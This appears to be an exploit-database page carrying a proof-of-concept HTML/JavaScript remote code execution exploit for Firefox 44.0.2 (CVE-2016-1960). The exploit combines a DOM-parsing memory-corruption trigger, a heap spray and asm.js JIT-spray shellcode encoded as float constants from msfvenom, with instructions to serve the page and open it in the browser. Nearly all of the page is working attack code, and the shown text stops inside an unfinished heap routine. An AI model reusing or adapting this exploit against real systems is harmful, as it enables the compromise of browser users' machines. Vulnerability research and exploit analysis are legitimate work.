Exploits / Vulnerability Discovered : 2018-03-16 |
Type : remote |
Platform : windows
This exploit / vulnerability Firefox 44.0.2 asm.js jitspray remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
<!DOCTYPE HTML>
<!--
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
*PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)
ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
Tested on:
Firefox 44.0.2 32-bit - Windows 10 1709
https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe
Howto:
1) serve PoC over network and open it in Firefox 44.0.2 32-bit
2) A successfull exploit attempt should pop calc.exe
Mozilla Bug Report:
https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
Notes:
*) very similar to CVE-2016-2819, but still different:
*) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1
because in 46.0.1 it is already fixed.
*) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it
was fixed in Firefox > 46.0.1
Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = '<table><svg><div id="AAAA">'
this.heap.gc()
var a = new Array()
for (var i=0; i < 0x11000; i++){
/* array element (Node object ptr) control with integer underflow */
a[i] = new Uint32Array(0x100/4)
for (var j=0; j<0x100/4; j++)
a[i][j] = node_ptr
}
/* original crashing testcase
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
*/
/* easier to exploit codepath */
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';
window.location.reload()
};
var Asmjs = function(){};
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
"use asm"
var foo = ffi.foo
function payload(){
var val = 0.0
/* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
val = +foo(
// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
-1.587865768352248e-263,
-8.692422460804815e-255,
7.529882109376901e-114,
2.0120602207293977e-16,
3.7204662687249914e-242,
4.351158092040946e+89,
2.284741716118451e+270,
7.620699014501263e-153,
5.996021286047645e+44,
-5.981935902612295e-92,
6.23540918304361e+259,
1.9227873281657598e+256,
2.0672493951546363e+187,
-6.971032919585734e+91,
5.651413300798281e-134,
-1.9040061366251406e+305,
-1.2687640718807038e-241,
9.697849844423e-310,
-2.0571400761625145e+306,
-1.1777948610587587e-123,
2.708909852013898e+289,
3.591750823735296e+37,
-1.7960516725035723e+106,
6.326776523166028e+180
)
return +val;
}
return payload
};
Asmjs.prototype.spray_float_payload = function(regions){
this.modules = new Array(regions).fill(null).map(
region => this.asm_js_module(window, {foo: () => 0})
)
};
var Heap = function(target_addr, eip){
this.node_heap = []
};